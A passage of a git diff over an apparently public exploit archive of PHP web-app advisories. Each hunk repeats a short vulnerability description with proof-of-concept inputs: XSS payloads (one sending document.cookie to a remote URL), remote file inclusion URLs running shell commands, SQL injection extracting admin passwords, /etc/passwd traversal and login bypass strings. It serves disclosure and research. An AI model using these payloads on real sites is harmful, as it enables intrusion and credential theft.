-http://www.example.com/index.php?search='>%3Cscript%3Ealert%28%27owned%27%29%3Blocation.href%3D%27http%3A%2F%2Fwww.example.com%27%3B%3C%2Fscript%3E&dir=&searchMode= \ No newline at end of file +http://www.example.com/index.php?search='>%3Cscript%3Ealert%28%27owned%27%29%3Blocation.href%3D%27http%3A%2F%2Fwww.example.com%27%3B%3C%2Fscript%3E&dir=&searchMode= \ No newline at end of file diff --git a/platforms/php/webapps/25941.txt b/platforms/php/webapps/25941.txt old mode 100755 new mode 100644 index 4f925be3e..cecbb97fe --- a/platforms/php/webapps/25941.txt +++ b/platforms/php/webapps/25941.txt @@ -4,4 +4,4 @@ MyGuestbook is prone to a remote file include vulnerability. This issue is due t An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. -http://www.example.com/gb/form.inc.php3?lang=http://www.example.com/cmd.gif?&cmd=id;uname%20-a;uptime \ No newline at end of file +http://www.example.com/gb/form.inc.php3?lang=http://www.example.com/cmd.gif?&cmd=id;uname%20-a;uptime \ No newline at end of file diff --git a/platforms/php/webapps/25942.txt b/platforms/php/webapps/25942.txt old mode 100755 new mode 100644 index e3b9b269a..1cfc68d9a --- a/platforms/php/webapps/25942.txt +++ b/platforms/php/webapps/25942.txt @@ -4,4 +4,4 @@ JAWS is prone to a remote file include vulnerability. This issue is due to a fai An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. -http://www.example.com/[path]/gadgets/Blog/BlogModel.php?path=http://www.example.com \ No newline at end of file +http://www.example.com/[path]/gadgets/Blog/BlogModel.php?path=http://www.example.com \ No newline at end of file diff --git a/platforms/php/webapps/25945.txt b/platforms/php/webapps/25945.txt old mode 100755 new mode 100644 index fca3cd657..7d58133ed --- a/platforms/php/webapps/25945.txt +++ b/platforms/php/webapps/25945.txt @@ -6,4 +6,4 @@ A remote unauthorized user can disclose the contents of arbitrary local files th The vendor has released the patch phpwebsite_security_patch_20050705.2.tgz addressing this issue. -http://www.example.com/phpwebsite/index.php?module=search&search_op=search&mod=../../../../../../../../etc/passwd%00&query=1&search=Search \ No newline at end of file +http://www.example.com/phpwebsite/index.php?module=search&search_op=search&mod=../../../../../../../../etc/passwd%00&query=1&search=Search \ No newline at end of file diff --git a/platforms/php/webapps/2595.txt b/platforms/php/webapps/2595.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25951.txt b/platforms/php/webapps/25951.txt old mode 100755 new mode 100644 index 5c3756151..666adf8a4 --- a/platforms/php/webapps/25951.txt +++ b/platforms/php/webapps/25951.txt @@ -7,4 +7,4 @@ Successful exploitation could result in a compromise of the application, disclos http://www.example.com/cartwiz/store/tellAFriend.asp?idProduct=' http://www.example.com/cartwiz/store/viewSupportTickets.asp?sortType='&sortOrder=ticketNum&page=0 http://www.example.com/cartwiz/store/updateCreditCards.asp?id=' -http://www.example.com/cartwiz/store/deleteCreditCards.asp?id=' \ No newline at end of file +http://www.example.com/cartwiz/store/deleteCreditCards.asp?id=' \ No newline at end of file diff --git a/platforms/php/webapps/25954.txt b/platforms/php/webapps/25954.txt old mode 100755 new mode 100644 index b06a754d7..6faf98ff6 --- a/platforms/php/webapps/25954.txt +++ b/platforms/php/webapps/25954.txt @@ -27,4 +27,4 @@ Authentication bypass: Set the cookie as follows: Name: PHPAUCTION_RM_ID -VALUE: Id number of the user/admin you want to impersonate (you can get it from thier profile) \ No newline at end of file +VALUE: Id number of the user/admin you want to impersonate (you can get it from thier profile) \ No newline at end of file diff --git a/platforms/php/webapps/25955.txt b/platforms/php/webapps/25955.txt old mode 100755 new mode 100644 index 261150316..640173c0e --- a/platforms/php/webapps/25955.txt +++ b/platforms/php/webapps/25955.txt @@ -6,4 +6,4 @@ Successful exploitation of this issue will allow an attacker to execute arbitrar Reports indicate that this issue may have been addressed in version 1.0, but this has not been confirmed. -http://www.example.com/[path_to_photogal]/ops/gals.php?news_file=http://www.example.com \ No newline at end of file +http://www.example.com/[path_to_photogal]/ops/gals.php?news_file=http://www.example.com \ No newline at end of file diff --git a/platforms/php/webapps/25957.txt b/platforms/php/webapps/25957.txt old mode 100755 new mode 100644 index f388f0036..ad9c61c26 --- a/platforms/php/webapps/25957.txt +++ b/platforms/php/webapps/25957.txt @@ -10,4 +10,4 @@ PunBB 1.2.5 and prior versions are vulnerable. Injecting the following can allow the attacker to gain administrative privileges: -temp[0]=group_id=1 \ No newline at end of file +temp[0]=group_id=1 \ No newline at end of file diff --git a/platforms/php/webapps/25958.txt b/platforms/php/webapps/25958.txt old mode 100755 new mode 100644 index 61f0f7ee5..b6a976267 --- a/platforms/php/webapps/25958.txt +++ b/platforms/php/webapps/25958.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos This issue is reported to affect ID Board version 1.1.3; other versions may also be vulnerable. -http://www.example.com/index.php?site=warn&f=1%20WHERE%200=1%20UNION%20SELECT%20mem_pw%20as%20post_topic_name%20FROM%20members%20WHERE%20mem_id=1/*&0&warn=0 \ No newline at end of file +http://www.example.com/index.php?site=warn&f=1%20WHERE%200=1%20UNION%20SELECT%20mem_pw%20as%20post_topic_name%20FROM%20members%20WHERE%20mem_id=1/*&0&warn=0 \ No newline at end of file diff --git a/platforms/php/webapps/25959.txt b/platforms/php/webapps/25959.txt old mode 100755 new mode 100644 index 906e47cbb..fd40c5d1e --- a/platforms/php/webapps/25959.txt +++ b/platforms/php/webapps/25959.txt @@ -6,4 +6,4 @@ SPiD is prone to a remote file include vulnerability, due to lack of validation An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. -http://www.example.com/SPiD/lang/lang.php?lang_path=http://www.example.com \ No newline at end of file +http://www.example.com/SPiD/lang/lang.php?lang_path=http://www.example.com \ No newline at end of file diff --git a/platforms/php/webapps/25960.txt b/platforms/php/webapps/25960.txt old mode 100755 new mode 100644 index 6ba84d7f6..28ef1714c --- a/platforms/php/webapps/25960.txt +++ b/platforms/php/webapps/25960.txt @@ -4,4 +4,4 @@ PPA is susceptible to a remote file include vulnerability. This issue is due to An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. -http://www.example.com/inc/functions.inc.php?config[ppa_root_path]=http://www.example.com \ No newline at end of file +http://www.example.com/inc/functions.inc.php?config[ppa_root_path]=http://www.example.com \ No newline at end of file diff --git a/platforms/php/webapps/25964.c b/platforms/php/webapps/25964.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25971.txt b/platforms/php/webapps/25971.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25973.txt b/platforms/php/webapps/25973.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2598.php b/platforms/php/webapps/2598.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2599.txt b/platforms/php/webapps/2599.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25990.txt b/platforms/php/webapps/25990.txt old mode 100755 new mode 100644 index fd2d53169..026f54495 --- a/platforms/php/webapps/25990.txt +++ b/platforms/php/webapps/25990.txt @@ -4,4 +4,4 @@ A cross-site scripting vulnerability affects Clever Copy. This issue is due to a An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/calendar.php?mth=3&yr=2006"><script src="http://www.example.com/dev/injection/js.js"></script> \ No newline at end of file +http://www.example.com/calendar.php?mth=3&yr=2006"><script src="http://www.example.com/dev/injection/js.js"></script> \ No newline at end of file diff --git a/platforms/php/webapps/25994.txt b/platforms/php/webapps/25994.txt old mode 100755 new mode 100644 index 4e4539a93..9eb644200 --- a/platforms/php/webapps/25994.txt +++ b/platforms/php/webapps/25994.txt @@ -7,4 +7,4 @@ Successful exploitation would result in information disclosure. Information obta This issue reportedly affects osCommerce version 2.2 milestone 2; other versions may also be vulnerable. http://www.example.com/catalog/extras/update.php?readme_file=/etc/passwd -http://www.example.com/catalog/extras/update.php?readme_file=../admin/.htaccess \ No newline at end of file +http://www.example.com/catalog/extras/update.php?readme_file=../admin/.htaccess \ No newline at end of file diff --git a/platforms/php/webapps/25995.txt b/platforms/php/webapps/25995.txt old mode 100755 new mode 100644 index 34998536e..dff7dfe62 --- a/platforms/php/webapps/25995.txt +++ b/platforms/php/webapps/25995.txt @@ -4,4 +4,4 @@ e107 Website System is prone to a script injection vulnerability. This issue is An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -[color=#EFEFEF][url]www.ut[url=http://www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.example.com/cgi-bin/shell.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color] \ No newline at end of file +[color=#EFEFEF][url]www.ut[url=http://www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.example.com/cgi-bin/shell.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color] \ No newline at end of file diff --git a/platforms/php/webapps/25996.txt b/platforms/php/webapps/25996.txt old mode 100755 new mode 100644 index c15f40994..b483429dd --- a/platforms/php/webapps/25996.txt +++ b/platforms/php/webapps/25996.txt @@ -48,4 +48,4 @@ Pagemanagement > Page name # blackpentesters.blogspot.com [2013-6-5] -# infotech-knowledge.blogspot.com \ No newline at end of file +# infotech-knowledge.blogspot.com \ No newline at end of file diff --git a/platforms/php/webapps/25997.txt b/platforms/php/webapps/25997.txt old mode 100755 new mode 100644 index 9e08df647..eeb02eb62 --- a/platforms/php/webapps/25997.txt +++ b/platforms/php/webapps/25997.txt @@ -4,4 +4,4 @@ tForum is prone to a cross-site scripting vulnerability. This issue is due to a An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/tforum/member.php?Action=viewprofile&username=<script>JavaScript:alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/tforum/member.php?Action=viewprofile&username=<script>JavaScript:alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/2600.txt b/platforms/php/webapps/2600.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26007.txt b/platforms/php/webapps/26007.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26009.txt b/platforms/php/webapps/26009.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26014.txt b/platforms/php/webapps/26014.txt old mode 100755 new mode 100644 index 190fbd273..d97237b89 --- a/platforms/php/webapps/26014.txt +++ b/platforms/php/webapps/26014.txt @@ -4,4 +4,4 @@ A cross-site scripting vulnerability affects Form Sender. This issue is due to a This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://[target]/[path]/processform.php3?name=<script>alert(document.cookie)</script> \ No newline at end of file +http://[target]/[path]/processform.php3?name=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/26015.txt b/platforms/php/webapps/26015.txt old mode 100755 new mode 100644 index 0c0e0c955..614bf52d1 --- a/platforms/php/webapps/26015.txt +++ b/platforms/php/webapps/26015.txt @@ -4,4 +4,4 @@ A cross-site scripting vulnerability affects Form Sender. This issue is due to a This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://[target]/[path]/processform.php3?failed=<script>alert(document.cookie)</script> \ No newline at end of file +http://[target]/[path]/processform.php3?failed=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/26016.txt b/platforms/php/webapps/26016.txt old mode 100755 new mode 100644 index 657a7c687..5823e53e0 --- a/platforms/php/webapps/26016.txt +++ b/platforms/php/webapps/26016.txt @@ -10,4 +10,4 @@ Enter the following string into the Username field: anything' or '1'='1'/* -followed by any characters in the Password field. \ No newline at end of file +followed by any characters in the Password field. \ No newline at end of file diff --git a/platforms/php/webapps/26018.txt b/platforms/php/webapps/26018.txt old mode 100755 new mode 100644 index c1491dd20..3eeb801cc --- a/platforms/php/webapps/26018.txt +++ b/platforms/php/webapps/26018.txt @@ -4,4 +4,4 @@ A cross-site scripting vulnerability affects Pyrox Search. This issue is due to An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://[www.example.com]/[path]/NEWSEARCH.php?whatdoreplace=whatdoreplace%00<script>alert(document.cookie)</script> \ No newline at end of file +http://[www.example.com]/[path]/NEWSEARCH.php?whatdoreplace=whatdoreplace%00<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/26019.txt b/platforms/php/webapps/26019.txt old mode 100755 new mode 100644 index 7db2b5328..dc4b4208c --- a/platforms/php/webapps/26019.txt +++ b/platforms/php/webapps/26019.txt @@ -10,4 +10,4 @@ supply the 'votingoption' parameter as value="1 /*!50030%20s*/" and submit the f /index.php?section=search&term=%22%3E%3Cscr\ipt%3Ealert(%22xss%22)%3C/sc\ript%3E -Create a blog entry with the title <script>alert('xss')</script> \ No newline at end of file +Create a blog entry with the title <script>alert('xss')</script> \ No newline at end of file diff --git a/platforms/php/webapps/2602.txt b/platforms/php/webapps/2602.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26020.txt b/platforms/php/webapps/26020.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26021.txt b/platforms/php/webapps/26021.txt old mode 100755 new mode 100644 index 59b1448dc..deb187fe6 --- a/platforms/php/webapps/26021.txt +++ b/platforms/php/webapps/26021.txt @@ -4,4 +4,4 @@ Asn Guestbook is prone to multiple cross-site scripting vulnerabilities. These i An attacker may leverage any of these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/footer.php?version=<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/footer.php?version=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/26023.txt b/platforms/php/webapps/26023.txt old mode 100755 new mode 100644 index 36e57c563..8b00369f1 --- a/platforms/php/webapps/26023.txt +++ b/platforms/php/webapps/26023.txt @@ -4,4 +4,4 @@ Atomic Photo Album is susceptible to a remote PHP file include vulnerability. Th An attacker may exploit this issue to execute arbitrary PHP code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. -http://www.example.com/apa_phpinclude.inc.php?apa_module_basedir=http://www.example.com/ \ No newline at end of file +http://www.example.com/apa_phpinclude.inc.php?apa_module_basedir=http://www.example.com/ \ No newline at end of file diff --git a/platforms/php/webapps/26025.txt b/platforms/php/webapps/26025.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26026.txt b/platforms/php/webapps/26026.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26027.txt b/platforms/php/webapps/26027.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26028.txt b/platforms/php/webapps/26028.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26029.txt b/platforms/php/webapps/26029.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2603.txt b/platforms/php/webapps/2603.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26030.txt b/platforms/php/webapps/26030.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26031.txt b/platforms/php/webapps/26031.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26034.txt b/platforms/php/webapps/26034.txt old mode 100755 new mode 100644 index bb1935481..5df738c11 --- a/platforms/php/webapps/26034.txt +++ b/platforms/php/webapps/26034.txt @@ -4,4 +4,4 @@ NETonE PHPBook is prone to a cross-site scripting vulnerability because the appl A successful exploit could allow an attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example/com/guestbook.php?admin="><script>alert(document.cookie)</script><!-- \ No newline at end of file +http://www.example/com/guestbook.php?admin="><script>alert(document.cookie)</script><!-- \ No newline at end of file diff --git a/platforms/php/webapps/26036.txt b/platforms/php/webapps/26036.txt old mode 100755 new mode 100644 index 8bc0ec83a..20f3b75a1 --- a/platforms/php/webapps/26036.txt +++ b/platforms/php/webapps/26036.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th PNG Counter 1.0 is vulnerable to this issue. -http://www.example.com/path/demo.php?digit=">XSS \ No newline at end of file +http://www.example.com/path/demo.php?digit=">XSS \ No newline at end of file diff --git a/platforms/php/webapps/26037.txt b/platforms/php/webapps/26037.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26038.txt b/platforms/php/webapps/26038.txt old mode 100755 new mode 100644 index 904b676c4..1533ad824 --- a/platforms/php/webapps/26038.txt +++ b/platforms/php/webapps/26038.txt @@ -5,4 +5,4 @@ Clever Copy is prone to multiple cross-site scripting vulnerabilities. These iss An attacker may leverage any of these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. http://www.example.com/categorysearch.php?star=0&searchtype="><script>XSS></script>category&searchterm=Announcements -http://www.example.com/categorysearch.php?star=0&searchtypecategory&searchterm=Announcements"><script>XSS</script> \ No newline at end of file +http://www.example.com/categorysearch.php?star=0&searchtypecategory&searchterm=Announcements"><script>XSS</script> \ No newline at end of file diff --git a/platforms/php/webapps/26039.txt b/platforms/php/webapps/26039.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2604.txt b/platforms/php/webapps/2604.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26040.txt b/platforms/php/webapps/26040.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26041.txt b/platforms/php/webapps/26041.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26042.txt b/platforms/php/webapps/26042.txt old mode 100755 new mode 100644 index 57b5abe6c..e5fcad536 --- a/platforms/php/webapps/26042.txt +++ b/platforms/php/webapps/26042.txt @@ -4,4 +4,4 @@ BMForum is prone to multiple cross-site scripting vulnerabilities. These issues An attacker may leverage any of these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/announcesys.php?forumid=0[XSS-CODE] \ No newline at end of file +http://www.example.com/announcesys.php?forumid=0[XSS-CODE] \ No newline at end of file diff --git a/platforms/php/webapps/26043.txt b/platforms/php/webapps/26043.txt old mode 100755 new mode 100644 index d0bed55ed..5387c0581 --- a/platforms/php/webapps/26043.txt +++ b/platforms/php/webapps/26043.txt @@ -8,4 +8,4 @@ http://www.example.com/readpm.php?op=read&ID=2&name=pruebas&user=waltrapass http://www.example.com/readpm.php?op=read&ID=2&user=waltrapass http://www.example.com/readpm.php?op=del&ID=2&name=pruebas&user=waltrapass -http://www.example.com/readpm.php?op=del&ID=2&user=waltrapass \ No newline at end of file +http://www.example.com/readpm.php?op=del&ID=2&user=waltrapass \ No newline at end of file diff --git a/platforms/php/webapps/26045.txt b/platforms/php/webapps/26045.txt old mode 100755 new mode 100644 index 395d7bbdc..16e556abe --- a/platforms/php/webapps/26045.txt +++ b/platforms/php/webapps/26045.txt @@ -5,4 +5,4 @@ PHPList is prone to an SQL injection vulnerability. This issue is due to a failu Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. http://www.example.com/public_html/lists/admin/?page=admin&id=INJECT HERE -http://www.example.com/lists/admin/?page=members&id=1%20union%20select%20null,password,null,null%20from%20phplist_admin%20where%20superuser=1/*sp_password \ No newline at end of file +http://www.example.com/lists/admin/?page=members&id=1%20union%20select%20null,password,null,null%20from%20phplist_admin%20where%20superuser=1/*sp_password \ No newline at end of file diff --git a/platforms/php/webapps/26047.txt b/platforms/php/webapps/26047.txt old mode 100755 new mode 100644 index ae545bcc8..479b143d4 --- a/platforms/php/webapps/26047.txt +++ b/platforms/php/webapps/26047.txt @@ -5,4 +5,4 @@ Easypx41 is prone to cross-site scripting vulnerabilities. An attacker may leverage these issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks. http://www.example.com/index.php?pg=modules/forum/viewprofil.php&membres=[Code-XSS] -http://www.example.com/index.php?pg=modules/forum/viewtopic.php&Forum=[Code-XSS]&pgfull \ No newline at end of file +http://www.example.com/index.php?pg=modules/forum/viewtopic.php&Forum=[Code-XSS]&pgfull \ No newline at end of file diff --git a/platforms/php/webapps/26048.txt b/platforms/php/webapps/26048.txt old mode 100755 new mode 100644 index bdb1f8737..8d1ae5cde --- a/platforms/php/webapps/26048.txt +++ b/platforms/php/webapps/26048.txt @@ -9,4 +9,4 @@ http://www.example.com/index.php?pg=modules/forum/viewtopic.php&Forum=Forum%20de http://www.example.com/index.php?pg=http://google.fr&pgtype=iframe&amp;amp;L=500&H=500 http://www.example.com/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection]&pgfull[variable-injection] http://www.example.com/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection] -http://www.example.com/index.php?pg=modules/forum/viewtopic.php&Forum=[change-or-variable-injection].&msg=1103495330.dat&pgfull \ No newline at end of file +http://www.example.com/index.php?pg=modules/forum/viewtopic.php&Forum=[change-or-variable-injection].&msg=1103495330.dat&pgfull \ No newline at end of file diff --git a/platforms/php/webapps/26049.txt b/platforms/php/webapps/26049.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2605.txt b/platforms/php/webapps/2605.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26050.txt b/platforms/php/webapps/26050.txt old mode 100755 new mode 100644 index 1a8ca3a2a..bf18670b1 --- a/platforms/php/webapps/26050.txt +++ b/platforms/php/webapps/26050.txt @@ -4,4 +4,4 @@ VBZooM Forum is prone to multiple cross-site scripting vulnerabilities. These is An attacker may leverage any of these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/vbzoom/login.php?UserID='<br><script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/vbzoom/login.php?UserID='<br><script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/26051.txt b/platforms/php/webapps/26051.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26052.txt b/platforms/php/webapps/26052.txt old mode 100755 new mode 100644 index 7e9df90b7..2d910a699 --- a/platforms/php/webapps/26052.txt +++ b/platforms/php/webapps/26052.txt @@ -8,4 +8,4 @@ http://www.example.com/index.php?date=22&month=3&year=2005%20UNION%20SELECT%200, username,pass%20FROM%20lrUsers%20WHERE%201/*&_g=2&_a=panel&_m=cal http://www.example.com/index.php?date=22%20UNION%20SELECT%200,0,0,0,0,0,username,pass%20 -FROM%20lrUsers%20WHERE%201/*&month=3&year=2005&_g=2&_a=panel&_m=cal \ No newline at end of file +FROM%20lrUsers%20WHERE%201/*&month=3&year=2005&_g=2&_a=panel&_m=cal \ No newline at end of file diff --git a/platforms/php/webapps/26053.txt b/platforms/php/webapps/26053.txt old mode 100755 new mode 100644 index 848e8c962..3e05f1708 --- a/platforms/php/webapps/26053.txt +++ b/platforms/php/webapps/26053.txt @@ -4,4 +4,4 @@ PluggedOut CMS is prone to multiple cross-site scripting and SQL injection vulne Exploitation could allow for theft of cookie-based authentication credentials or unauthorized access to database data. Other attacks are also possible. -http://www.example.com/admin.php?action=report_statistics&report=visitors&list_from=[SQL-Injection] \ No newline at end of file +http://www.example.com/admin.php?action=report_statistics&report=visitors&list_from=[SQL-Injection] \ No newline at end of file diff --git a/platforms/php/webapps/26054.txt b/platforms/php/webapps/26054.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26055.txt b/platforms/php/webapps/26055.txt old mode 100755 new mode 100644 index 367858db6..fcacf91b4 --- a/platforms/php/webapps/26055.txt +++ b/platforms/php/webapps/26055.txt @@ -6,4 +6,4 @@ Exploitation could yield administrative access to the ROCP site. This issue may be exclusive to sites hosting ROCP with Apache Web server. This has not been confirmed. -http://www.example.com/CP/account_manage.php/login.php \ No newline at end of file +http://www.example.com/CP/account_manage.php/login.php \ No newline at end of file diff --git a/platforms/php/webapps/26056.txt b/platforms/php/webapps/26056.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26057.txt b/platforms/php/webapps/26057.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26058.txt b/platforms/php/webapps/26058.txt old mode 100755 new mode 100644 index 3d79bf86b..5ab11fd8a --- a/platforms/php/webapps/26058.txt +++ b/platforms/php/webapps/26058.txt @@ -4,4 +4,4 @@ MySQL Eventum is prone to multiple cross-site scripting vulnerabilities. These i An attacker may leverage any of these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/eventum/get_jsrs_data.php?F=wee%22%3E%3Ciframe%3E \ No newline at end of file +http://www.example.com/eventum/get_jsrs_data.php?F=wee%22%3E%3Ciframe%3E \ No newline at end of file diff --git a/platforms/php/webapps/26059.txt b/platforms/php/webapps/26059.txt old mode 100755 new mode 100644 index 0fe645662..8b983fa68 --- a/platforms/php/webapps/26059.txt +++ b/platforms/php/webapps/26059.txt @@ -18,4 +18,4 @@ http://[target]/[path]/search.php?front_searchresult=</title><script>alert(docum http://[target]/[path]/search.php?front_searchsubmit="><script>alert(document.cookie)</script> http://[target]/[path]/catalog.php?front_searchsubmit="><script>alert(document.cookie)</script> http://[target]/[path]/catalog.php?front_latestnews="><script>alert(document.cookie)</script> -http://[target]/[path]/catalog.php?catalogid="><script>alert(document.cookie)</script> \ No newline at end of file +http://[target]/[path]/catalog.php?catalogid="><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/2606.txt b/platforms/php/webapps/2606.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26061.txt b/platforms/php/webapps/26061.txt old mode 100755 new mode 100644 index d7074bcb0..ab2c999bc --- a/platforms/php/webapps/26061.txt +++ b/platforms/php/webapps/26061.txt @@ -7,4 +7,4 @@ Successful exploitation could result in a compromise of the application, disclos An example has been provided: login: Admin -password: ') or isnull(1/0) or ('a'='a \ No newline at end of file +password: ') or isnull(1/0) or ('a'='a \ No newline at end of file diff --git a/platforms/php/webapps/26062.txt b/platforms/php/webapps/26062.txt old mode 100755 new mode 100644 index 563d80a5c..e45ff2a60 --- a/platforms/php/webapps/26062.txt +++ b/platforms/php/webapps/26062.txt @@ -7,4 +7,4 @@ Successful exploitation could result in a compromise of the application, disclos A proof of concept follows: User ID: admin -Password: no') or 1/* \ No newline at end of file +Password: no') or 1/* \ No newline at end of file diff --git a/platforms/php/webapps/26063.txt b/platforms/php/webapps/26063.txt old mode 100755 new mode 100644 index fd96344f0..70e6968c6 --- a/platforms/php/webapps/26063.txt +++ b/platforms/php/webapps/26063.txt @@ -4,4 +4,4 @@ Naxtor Shopping Cart is prone to a cross-site scripting vulnerability. This issu An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/lost_password.php?&email=<script>var%20xss=31337;alert(xss);</script>&reset=reset \ No newline at end of file +http://www.example.com/lost_password.php?&email=<script>var%20xss=31337;alert(xss);</script>&reset=reset \ No newline at end of file diff --git a/platforms/php/webapps/26064.txt b/platforms/php/webapps/26064.txt old mode 100755 new mode 100644 index ef09ae0df..0613ec7c7 --- a/platforms/php/webapps/26064.txt +++ b/platforms/php/webapps/26064.txt @@ -4,4 +4,4 @@ Naxtor Shopping Cart is prone to an SQL injection vulnerability. This issue is d Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/shop_display_products.php?cat_id=' \ No newline at end of file +http://www.example.com/shop_display_products.php?cat_id=' \ No newline at end of file diff --git a/platforms/php/webapps/26067.txt b/platforms/php/webapps/26067.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26068.txt b/platforms/php/webapps/26068.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2607.txt b/platforms/php/webapps/2607.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26072.txt b/platforms/php/webapps/26072.txt old mode 100755 new mode 100644 index 53be36411..f1eec51d3 --- a/platforms/php/webapps/26072.txt +++ b/platforms/php/webapps/26072.txt @@ -6,4 +6,4 @@ The consequences of this attack may vary depending on the type of queries that c This issue is reported to affect Portail PHP version 2.4; Conflicting reports indicate this information may be inaccurate. -http://www.example.com/portailphp/index.php?affiche=Forum-read_mess&id=' \ No newline at end of file +http://www.example.com/portailphp/index.php?affiche=Forum-read_mess&id=' \ No newline at end of file diff --git a/platforms/php/webapps/26077.txt b/platforms/php/webapps/26077.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26079.txt b/platforms/php/webapps/26079.txt old mode 100755 new mode 100644 index a10ef6d5c..5c57c1b1e --- a/platforms/php/webapps/26079.txt +++ b/platforms/php/webapps/26079.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary server-side script code This issue reportedly affect Comdev eCommerce version 3.0; other versions may also be vulnerable. -http://www.example.com/oneadmin/config.php?path[docroot]=http://www.example.com/badscript.php.txt \ No newline at end of file +http://www.example.com/oneadmin/config.php?path[docroot]=http://www.example.com/badscript.php.txt \ No newline at end of file diff --git a/platforms/php/webapps/2608.txt b/platforms/php/webapps/2608.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26080.txt b/platforms/php/webapps/26080.txt old mode 100755 new mode 100644 index 